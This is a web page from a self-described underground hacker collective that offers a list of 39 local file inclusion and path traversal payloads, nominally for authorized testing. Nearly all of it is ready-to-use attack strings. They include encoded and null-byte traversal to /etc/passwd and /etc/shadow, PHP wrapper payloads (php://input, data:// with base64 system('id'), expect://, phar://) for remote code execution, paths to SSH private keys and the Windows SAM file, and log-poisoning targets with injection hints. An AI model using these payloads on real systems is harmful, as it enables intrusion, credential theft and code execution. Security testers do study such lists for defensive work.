SovietGhost | Underground Hacker Collective

lfi-payloads

root@sovietghost:~/tools/lfi-payloads#

39 LFI / path traversal payloads — traversal, encoding bypass, PHP wrappers, log poisoning. Authorized testing only.

39 payloads

Basic ../Path Traversal

../../../etc/passwd

Deep traversalPath Traversal

../../../../../../../../etc/passwd

Absolute pathPath Traversal

/etc/passwd

Mixed slashesPath Traversal

..\..\..\etc\passwd

Backslash (Windows)Path Traversal

..\..\..\windows\win.ini

Null byte bypassPath Traversal

../../../etc/passwd%00

ⓘ terminates string in older PHP

Null byte + .php extPath Traversal

../../../etc/passwd%00.php

Extra ../ after pathPath Traversal

....//....//....//etc/passwd

ⓘ collapse after strip

URL-encoded /Encoding Bypass

..%2F..%2F..%2Fetc%2Fpasswd

Double URL-encodedEncoding Bypass

..%252F..%252F..%252Fetc%252Fpasswd

UTF-8 dot encodeEncoding Bypass

%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

16-bit UnicodeEncoding Bypass

..%c0%af..%c0%af..%c0%afetc%c0%afpasswd

ⓘ overlong UTF-8 for /

../ stripped bypassEncoding Bypass

.././.././.././etc/passwd

ⓘ collapses to ../../../ after strip

Nested ../ bypassEncoding Bypass

....//....//....//etc//passwd

php://filter base64PHP Wrappers

php://filter/convert.base64-encode/resource=index.php

ⓘ read PHP source code

php://filter rot13PHP Wrappers

php://filter/read=string.rot13/resource=index.php

php://input RCEPHP Wrappers

php://input

ⓘ POST body executed as PHP; send <?php system('id');?>

data:// RCEPHP Wrappers

data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+

ⓘ <?php system('id');?> in b64

expect:// RCEPHP Wrappers

expect://id

ⓘ requires expect:// extension

zip:// RCEPHP Wrappers

zip://path/to/file.zip%23shell.php

phar:// RCEPHP Wrappers

phar://path/to/file.phar/shell.php

/etc/passwdLinux Files

/etc/passwd

/etc/shadowLinux Files

/etc/shadow

ⓘ requires root

/etc/hostsLinux Files

/etc/hosts

/proc/self/environLinux Files

/proc/self/environ

ⓘ web server env vars

/proc/self/cmdlineLinux Files

/proc/self/cmdline

/proc/net/tcpLinux Files

/proc/net/tcp

ⓘ open TCP connections

SSH private keyLinux Files

/home/user/.ssh/id_rsa

/var/www/html/configLinux Files

/var/www/html/config.php

win.iniWindows Files

C:\Windows\win.ini

system.iniWindows Files

C:\Windows\system.ini

SAM (shadow copy)Windows Files

\\?\C:\Windows\System32\config\SAM

IIS web.configWindows Files

C:\inetpub\wwwroot\web.config

Apache access.logLog Poisoning

/var/log/apache2/access.log

Apache error.logLog Poisoning

/var/log/apache2/error.log

Nginx access.logLog Poisoning

/var/log/nginx/access.log

SSH auth.logLog Poisoning

/var/log/auth.log

ⓘ poison with PHP in SSH username

PHP session fileLog Poisoning

/var/lib/php/sessions/sess_SESSIONID

ⓘ replace SESSIONID

vsftpd.logLog Poisoning

/var/log/vsftpd.log